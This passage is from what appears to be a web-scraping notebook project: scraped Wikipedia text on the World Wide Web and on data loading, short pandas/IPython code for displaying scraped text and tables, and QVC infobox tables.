reader the site structure and guides the navigation of the site, which often starts with a home page containing a directory of the site web content. Some websites require user registration or subscription to access content. Examples of subscription websites include many business sites, news websites, academic journal websites, gaming websites, file-sharing websites, message boards, web-based email, social networking websites, websites providing real-time price quotations for different types of markets, as well as sites providing various other services. End users can access websites on a range of devices, including desktop and laptop computers, tablet computers, smartphones and smart TVs. A web browser (commonly referred to as a browser) is a software user agent for accessing information on the World Wide Web. To connect to a website's server and display its pages, a user needs to have a web browser program. This is the program that the user runs to download, format, and display a web page on the user's computer. In addition to allowing users to find, display, and move between web pages, a web browser will usually have features like keeping bookmarks, recording history, managing cookies (see below), and home pages and may have facilities for recording passwords for logging into web sites. The most popular browsers are Chrome, Firefox, Safari, Internet Explorer, and Edge. A Web server is server software, or hardware dedicated to running said software, that can satisfy World Wide Web client requests. A web server can, in general, contain one or more websites. A web server processes incoming network requests over HTTP and several other related protocols. The primary function of a web server is to store, process and deliver web pages to clients. 50 The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP). Pages delivered are most frequently HTML documents, which may include images, style sheets and scripts in addition to the text content. A user agent, commonly a web browser or web crawler, initiates communication by making a request for a specific resource using HTTP and the server responds with the content of that resource or an error message if unable to do so. The resource is typically a real file on the server's secondary storage, but this is not necessarily the case and depends on how the webserver is implemented. While the primary function is to serve content, full implementation of HTTP also includes ways of receiving content from clients. This feature is used for submitting web forms, including uploading of files. Many generic web servers also support server-side scripting using Active Server Pages (ASP), PHP (Hypertext Preprocessor), or other scripting languages. This means that the behaviour of the webserver can be scripted in separate files, while the actual server software remains unchanged. Usually, this function is used to generate HTML documents dynamically ("on-the-fly") as opposed to returning static documents. The former is primarily used for retrieving or modifying information from databases. The latter is typically much faster and more easily cached but cannot deliver dynamic content. Web servers can also frequently be found embedded in devices such as printers, routers, webcams and serving only a local network. The web server may then be used as a part of a system for monitoring or administering the device in question. This usually means that no additional software has to be installed on the client computer since only a web browser is required (which now is included with most operating systems). An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added in the shopping cart in an online store) or to record the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to remember arbitrary pieces of information that the user previously entered into form fields such as names, addresses, passwords, and credit card numbers. Cookies perform essential functions in the modern web. Perhaps most importantly, authentication cookies are the most common method used by web servers to know whether the user is logged in or not, and which account they are logged in with. Without such a mechanism, the site would not know whether to send a page containing sensitive information or require the user to authenticate themselves by logging in. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted. Security vulnerabilities may allow a cookie's data to be read by a hacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples). 51 Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories a potential privacy concern that prompted European 52 and U.S. lawmakers to take action in 2011. 53 54 European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device. Google Project Zero researcher Jann Horn describes ways cookies can be read by intermediaries, like Wi-Fi hotspot providers. When in such circumstances, he recommends using the browser in private browsing mode (widely known as Incognito mode in Google Chrome). 55 A web search engine or Internet search engine is a software system that is designed to carry out web search (Internet search), which means to search the World Wide Web in a systematic way for particular information specified in a web search query. The search results are generally presented in a line of results, often referred to as search engine results pages (SERPs). The information may be a mix of web pages, images, videos, infographics, articles, research papers, and other types of files. Some search engines also mine data available in databases or open directories. Unlike web directories, which are maintained only by human editors, search engines also maintain real-time information by running an algorithm on a web crawler. Internet content that is not capable of being searched by a web search engine is generally described as the deep web. The deep web, 56 invisible web, 57 or hidden web 58 are parts of the World Wide Web whose contents are not indexed by standard web search engines. The opposite term to the deep web is the surface web, which is accessible to anyone using the Internet. 59 Computer scientist Michael K. Bergman is credited with coining the term deep web in 2001 as a search indexing term. 60 The content of the deep web is hidden behind HTTP forms, 61 62 and includes many very common uses such as web mail, online banking, and services that users must pay for, and which is protected by a paywall, such as video on demand, some online magazines and newspapers, among others. The content of the deep web can be located and accessed by a direct URL or IP address and may require a password or other security access past the public website page. A web cache is a server computer located either on the public Internet or within an enterprise that stores recently accessed web pages to improve response time for users when the same content is requested within a certain time after the original request. Most web browsers also implement a browser cache by writing recently obtained data to a local data storage device. HTTP requests by a browser may ask only for data that has changed since the last access. Web pages and resources may contain expiration information to control caching to secure sensitive data, such as in online banking, or to facilitate frequently updated sites, such as news media. Even sites with highly dynamic content may permit basic resources to be refreshed only occasionally. Web site designers find it worthwhile to collate resources such as CSS data and JavaScript into a few site-wide files so that they can be cached efficiently. Enterprise firewalls often cache Web resources requested by one user for the benefit of many users. Some search engines store cached content of frequently accessed websites. For criminals, the Web has become a venue to spread malware and engage in a range of cybercrimes, including (but not limited to) identity theft, fraud, espionage and intelligence gathering. 63 Web-based vulnerabilities now outnumber traditional computer security concerns, 64 65 and as measured by Google, about one in ten web pages may contain malicious code. 66 Most web-based attacks take place on legitimate websites, and most, as measured by Sophos, are hosted in the United States, China and Russia. 67 The most common of all malware threats is SQL injection attacks against websites. 68 Through HTML and URIs, the Web was vulnerable to attacks like cross-site scripting (XSS) that came with the introduction of JavaScript 69 and were exacerbated to some degree by Web 2.0 and Ajax web design that favours the use of scripts. 70 Today as of? by one estimate, 70% of all websites are open to XSS attacks on their users. 71 Phishing is another common threat to the Web. In February 2013, RSA (the security division of EMC) estimated the global losses from phishing at $1.5 billion in 2012. 72 Two of the well-known phishing methods are Covert Redirect and Open Redirect. Proposed solutions vary. Large security companies like McAfee already design governance and compliance suites to meet post 9 11 regulations, 73 and some, like Finjan have recommended active real-time inspection of programming code and all content regardless of its source. 63 Some have argued that for enterprises to see Web security as a business opportunity rather than a cost centre, 74 while others call for "ubiquitous, always-on digital rights management" enforced in the infrastructure to replace the hundreds of companies that secure data and networks. 75 Jonathan Zittrain has said users sharing responsibility for computing safety is far preferable to locking down the Internet. 76 Every time a client requests a web page, the server can identify the request's IP address. Web servers usually log IP addresses in a log file. Also, unless set not to do so, most web browsers record requested web pages in a viewable history feature, and usually cache much of the content locally. Unless the server-browser communication uses HTTPS encryption, web requests and responses travel in plain text across the Internet and can be viewed, recorded, and cached by intermediate systems. Another way to hide personally identifiable information is by using a virtual private network. A VPN encrypts online traffic and masks the original IP address lowering the chance of user identification. When a web page asks for, and the user supplies, personally identifiable information—such as their real name, address, e-mail address, etc. web-based entities can associate current web traffic with that individual. If the website uses HTTP cookies, username, and password authentication, or other tracking techniques, it can relate other web visits, before and after, to the identifiable information provided. In this way, a web-based organization can develop and build a profile of the individual people who use its site or sites. It may be able to build a record for an individual that includes information about their leisure activities, their shopping interests, their profession, and other aspects of their demographic profile. These profiles are of potential interest to marketers, advertisers, and others. Depending on the website's terms and conditions and the local laws that apply information from these profiles may be sold, shared, or passed to other organizations without the user being informed. For many ordinary people, this means little more than some unexpected e-mails in their in-box or some uncannily relevant advertising on a future web page. For others, it can mean that time spent indulging an unusual interest can result in a deluge of further targeted marketing that may be unwelcome. Law enforcement, counterterrorism, and espionage agencies can also identify, target, and track individuals based on their interests or proclivities on the Web. Social networking sites usually try to get users to use their real names, interests, and locations, rather than pseudonyms, as their executives believe that this makes the social networking experience more engaging for users. On the other hand, uploaded photographs or unguarded statements can be identified to an individual, who may regret this exposure. Employers, schools, parents, and other relatives may be influenced by aspects of social networking profiles, such as text posts or digital photos, that the posting individual did not intend for these audiences. Online bullies may make use of personal information to harass or stalk users. Modern social networking websites allow fine-grained control of the privacy settings for each posting, but these can be complex and not easy to find or use, especially for beginners. 77 Photographs and videos posted onto websites have caused particular problems, as they can add a person's face to an online profile. With modern and potential facial recognition technology, it may then be possible to relate that face with other, previously anonymous, images, events, and scenarios that have been imaged elsewhere. Due to image caching, mirroring, and copying, it is difficult to remove an image from the World Wide Web. Web standards include many interdependent standards and specifications, some of which govern aspects of the Internet, not just the World Wide Web. Even when not web-focused, such standards directly or indirectly affect the development and administration of websites and web services. Considerations include the interoperability, accessibility and usability of web pages and web sites. Web standards, in the broader sense, consist of the following: Web standards are not fixed sets of rules but are constantly evolving sets of finalized technical specifications of web technologies. 84 Web standards are developed by standards organizations—groups of interested and often competing parties chartered with the task of standardization—not technologies developed and declared to be a standard by a single individual or company. It is crucial to distinguish those specifications that are under development from the ones that already reached the final development status (in the case of W3C specifications, the highest maturity level). There are methods for accessing the Web in alternative mediums and formats to facilitate use by individuals with disabilities. These disabilities may be visual, auditory, physical, speech-related, cognitive, neurological, or some combination. Accessibility features also help people with temporary disabilities, like a broken arm, or ageing users as their abilities change. 85 The Web is receiving information as well as providing information and interacting with society. The World Wide Web Consortium claims that it is essential that the Web be accessible, so it can provide equal access and equal opportunity to people with disabilities. 86 Tim Berners-Lee once noted, "The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. 85 Many countries regulate web accessibility as a requirement for websites. 87 International co-operation in the W3C Web Accessibility Initiative led to simple guidelines that web content authors as well as software developers can use to make the Web accessible to persons who may or may not be using assistive technology. 85 88 The W3C Internationalisation Activity assures that web technology works in all languages, scripts, and cultures. 89 Beginning in 2004 or 2005, Unicode gained ground and eventually in December 2007 surpassed both ASCII and Western European as the Web's most frequently used character encoding. 90 Originally RFC 3986 allowed resources to be identified by URI in a subset of US-ASCII. RFC 3987 allows more characters—any character in the Universal Character Set—and now a resource can be identified by IRI in any language. 91 |
print()
with final_data['scraped_text']
and .iloc[]
. Simply find the index number of the row in the display above that contains your web page of interest, and enter the index number in .iloc[]
. E.g., if you are interested in viewing the extracted text from Wikipedia's article on "Data Loading" (index 191), located at https://en.wikipedia.org/wiki/Data_loading, you would use the following code:¶print(final_data['scraped_text'].iloc[191])
Data loading, or simply loading, is a part of data processing where data is moved between two systems so that it ends up in a staging area on the target system. With the traditional extract, transform and load (ETL) method, the load job is the last step, and the data that is loaded has already been transformed. With the alternative method extract, load and transform (ELT), the loading job is the middle step, and the transformed data is loaded in its original format for data transformation in the target system. Traditionally, loading jobs on large systems have taken a long time, and have typically been run at night outside a company's opening hours. Two main goals of data loading are to obtain fresher data in the systems after loading, and that the loading is fast so that the data can be updated frequently. For full data refresh, faster loading can be achieved by turning off referential integrity, secondary indexes and logging, but this is usually not allowed with incremental update or trickle feed. Data loading can be done either by complete update (immediate), incremental loading and updating (immediate), or trickle feed (deferred). The choice of technique may depend on the amount of data that is updated, changed or added, and how up-to-date the data must be. The type of data delivered by the source system, and whether historical data delivered by the source system can be trusted are also important factors. Full data refresh means that existing data in the target table is deleted first. All data from the source is then loaded into the target table, new indexes are created in the target table, and new measures are calculated for the updated table. Full refresh is easy to implement, but involves moving of much data which can take a long time, and can make it challenging to keep historical data. 1 Incremental update or incremental refresh means that only new or updated data is retrieved from the source system. 2 3 The updated data is then added to the existing data in the target system, and the existing data in the target system is updated. The indices and statistics are updated accordingly. Incremental update can make loading faster and make it easier to keep track of history, but can be demanding to set up and maintain. 1 Tricle feed or trickle loading means that when the source system is updated, the changes in the target system will occur almost immediately. 4 5 When loading data into a system that is currently in use by users or other systems, one must decide when the system should be updated and what will happen to tables that are in use at the same time as the system is to be updated. One possible solution is to make use of shadow tables. 6 7
.iloc[191]
) with prettier font styling, use the following code which implements the <pre>
tag and escape()
steps used earlier:¶display(HTML(f"<pre style='font-family: Georgia, serif; font-size: 18px;'>{html.escape(final_data['scraped_text'].iloc[191])}</pre>"))
Data loading, or simply loading, is a part of data processing where data is moved between two systems so that it ends up in a staging area on the target system. With the traditional extract, transform and load (ETL) method, the load job is the last step, and the data that is loaded has already been transformed. With the alternative method extract, load and transform (ELT), the loading job is the middle step, and the transformed data is loaded in its original format for data transformation in the target system. Traditionally, loading jobs on large systems have taken a long time, and have typically been run at night outside a company's opening hours. Two main goals of data loading are to obtain fresher data in the systems after loading, and that the loading is fast so that the data can be updated frequently. For full data refresh, faster loading can be achieved by turning off referential integrity, secondary indexes and logging, but this is usually not allowed with incremental update or trickle feed. Data loading can be done either by complete update (immediate), incremental loading and updating (immediate), or trickle feed (deferred). The choice of technique may depend on the amount of data that is updated, changed or added, and how up-to-date the data must be. The type of data delivered by the source system, and whether historical data delivered by the source system can be trusted are also important factors. Full data refresh means that existing data in the target table is deleted first. All data from the source is then loaded into the target table, new indexes are created in the target table, and new measures are calculated for the updated table. Full refresh is easy to implement, but involves moving of much data which can take a long time, and can make it challenging to keep historical data. 1 Incremental update or incremental refresh means that only new or updated data is retrieved from the source system. 2 3 The updated data is then added to the existing data in the target system, and the existing data in the target system is updated. The indices and statistics are updated accordingly. Incremental update can make loading faster and make it easier to keep track of history, but can be demanding to set up and maintain. 1 Tricle feed or trickle loading means that when the source system is updated, the changes in the target system will occur almost immediately. 4 5 When loading data into a system that is currently in use by users or other systems, one must decide when the system should be updated and what will happen to tables that are in use at the same time as the system is to be updated. One possible solution is to make use of shadow tables. 6 7
"""
from IPython.display import display, HTML
# Use to display tables in html along with their URLs from the first 5 scraped URLs by using .head().
for index, row in final_data.head().iterrows():
# Display the original URL and the scraped URL from which the tables were extracted
display(HTML(f"<b>Original URL:</b> {row['original_url']}<br><b>Scraped URL:</b> {row['scraped_url']}"))
# Check if there is any HTML table to display
if row['scraped_tables']:
display(HTML(row['scraped_tables']))
else:
display(HTML("<p>No tables found.</p>"))
# Display a thick black line as a separator after each URL's data before moving on to the next
if index < len(final_data) - 1: # Ensure the line is not added after the last item
display(HTML('<hr style="border: 2px solid black;">'))
"""
.head()
from final_data.head().iterrows()
in the above code, it will show all tables from all scraped URLs (i.e., nearly 700 URLs) saved in the final_data object. However, if you have scraped many URLs as is the case in this portfolio project, doing so will likely overload your memory.¶from IPython.display import display, HTML
# Directly access the row in which the index number is 58 (iloc[58]), which shows all extracted tables from
# the Wikipedia web page on QVC.
row = final_data.iloc[58]
# First display the original URL and the scraped URL from which the tables were extracted
display(HTML(f"<b>Original URL:</b> {row['original_url']}<br><b>Scraped URL:</b> {row['scraped_url']}"))
# Check if there are any HTML tables to display. If so, display them.
if row['scraped_tables']:
display(HTML(row['scraped_tables']))
else:
display(HTML("<p>No tables found.</p>"))
Country | United States |
---|---|
Broadcast area | Worldwide |
Headquarters | 1200 Wilson Drive, West Chester, Pennsylvania 19380 |
Programming | |
Language(s) | English |
Picture format | 2160p UHDTV 1080i HDTV (downscaled to letterboxed 480i for the SDTV feed) |
Ownership | |
Owner | Qurate Retail Group |
Sister channels | (see below) |
History | |
Launched | November 24, 1986[1] |
Links | |
Website | qvc.com |
Availability | |
Terrestrial | |
ABC Owned Television Stations | -DT4 channel position; list of stations |
Over-the-air as a subchannel | Consult local listings |
Streaming media | |
QVC | Live Stream |
Apple TV & Amazon Fire TV | QVC app (all QVC networks) |
Roku | QVC/HSN app (all QVC & HSN networks) |
Frndly TV | Internet Protocol television |
Ownership | |
---|---|
Sister channels | (see above) |
History | |
Launched | August 22, 2013 |
Former names | QVC Plus (2013–2017) |
Links | |
Website | qvc.com |
History | |
---|---|
Launched | April 1, 2019 |
Links | |
Website | qvc.com |
History | |
---|---|
Launched | April 23, 2019 |
Former names | Beauty iQ (2019-2021) |
Links | |
Website | qvc.com |
QVC Group | |
---|---|
Liberty Ventures Group |
|